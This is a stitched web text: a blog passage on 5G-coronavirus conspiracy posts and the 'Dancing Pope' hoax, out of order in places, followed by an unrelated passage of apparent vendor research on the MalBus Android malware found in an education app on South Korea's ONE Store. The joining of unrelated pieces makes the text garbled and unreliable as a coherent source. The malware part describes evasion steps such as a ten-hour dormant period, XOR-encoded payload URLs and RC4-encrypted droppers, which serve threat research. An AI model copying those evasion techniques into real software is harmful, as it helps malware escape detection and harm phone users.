It's very likely Helen doesn't have an informed view on the 5G situation and that it's appealing to her confirmation bias (I'm drawing that conclusion based on her other tweets), yet she's appealing to thousands of follows to reinforce her own view of 5G. When Bal watched the video of a former Vodafone employee drawing links between 5G and coronavirus it "connected a lot of dots" for him (which again, is obviously just appealing to his own confirmation bias), and he encouraged others to watch it and draw the same conclusion. This is the viral nature of social media - one person's enthusiasm or endorsement rapidly spreads to others and it's just so easy to replicate a message without giving any thought to the topic nor the consequences that "going viral" can have.

Going back to the Dance of the Pope, I asked the sender of the hoax what made her believe it was real and now that she knows it's a hoax, how she feels about it:

Let's Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns

This sentence nails it, both as it relates to the hoax video and much of the 5G debate that's currently raging:

In my case (& I think with many others), when you know that you lack knowledge & experience in this field, & that you don’t know enough to call it ‘most definitely’ a scam, (& that you feel it’s arrogant to make a choice on other people’s behalf) you err on side of caution & post it on

You know you lack knowledge but you post it on anyway. Now here we are with a dancing pope and 5G spreading coronavirus.

Insight 5: Question why you're being encouraged to influence others and if you're sufficiently informed to do so.


The problem with the 5G situation specifically is that if there are valid concerns to be had, they're buried in there somewhere amongst all the crazy. And let's face it, there's a whole spectrum of legitimacy in this discussion, the challenge is sifting through it, discarding the rubbish and focusing on the good stuff. And that's really the point of this post: being able to identify when information is hyperbolic and likely to be either misleading or outright false versus something we genuinely need to take seriously.

If I was to be concerned about 5G (which I'm not) and I wanted to learn more (which at this stage, I don't), I'd go straight to a technology resource I trusted. Many people pointed me at Wired's coverage in December so if you want to learn more, start there. I'd also defer to the likes of the World Health Organisation:

I wouldn't go to Jenn in Parkerville because without evidence to contrary, I can only assume she has absolutely no idea what she's talking about. I also wouldn't share any information on the topic unless I felt informed enough to influence others. I do feel informed enough to share an opinion on hoaxes and disinformation campaigns, so here we all are.

If I've appealed to your own confirmation bias by highlighting nut jobs talking about 5G conspiracy theories, please share this post with your entire social network ?

MalBus Actor Changed Market from Google Play to ONE Store

McAfee Mobile Research team has found another variant of MalBus on an education application, developed by a South Korean developer. In the previous Malbus case, the author distributed the malware through Google Play, but new variants are distributed via the ONE Store in much the same way. ONE Store is a joint venture by the country’s three major telecom companies and is a preinstalled app on most Android phones selling in South Korea. It has 35 million users (close to 70% of South Korea’s population) and has already surpassed Apple’s app store sales from the end of 2018.

The application in question is distributed via Google Play and the ONE Store at the same time. The malicious application downloads and runs an encrypted payload with malicious functions.

McAfee Mobile Security detects this threat as Android/Malbus and alerts mobile users if it is present, while protecting them from any data loss.

Figure 1. Screen capture from the application page on the ONE Store

The Campaign

We found malicious code injected by an attacker, via the developer’s account, into versions 27 and 28 of the application distributed through the ONE Store. The App Signature Certificate for versions 26 through 29 distributed from the One Store are the same. No other application developed by the same author was found on the ONE Store. The ONE Store is now servicing version 29 which does not contain malicious code. Google Play still offers version 26, though this is also clear of infection.

Figure 2. Infected version history of the application

The overall flow of this application, focusing on the malicious function, is explained below:

Figure 3. Overview of malicious behavior

After the malware is installed, the malicious code has a latent period of 10 hours to avoid being discovered by dynamic analysis.

Figure 4. Using LastUpdateTime to check latent period

After the latent period, it starts two threads. The first one loads native library “” and calls one of its exported functions, “playMovie”, with a phone number as an argument while the second one creates a Java server socket for communication with another native library.

Figure 5. The malicious native library embedded in the APK

The first loaded library,, contains a curl binary and URLs for secondary payloads in XOR encoded data which are decoded at runtime. The XOR value is 0x8E and it is globally used in this library. All decoded URLs appear to have been hacked and the decoded URLs drop RC4 encrypted ELF files.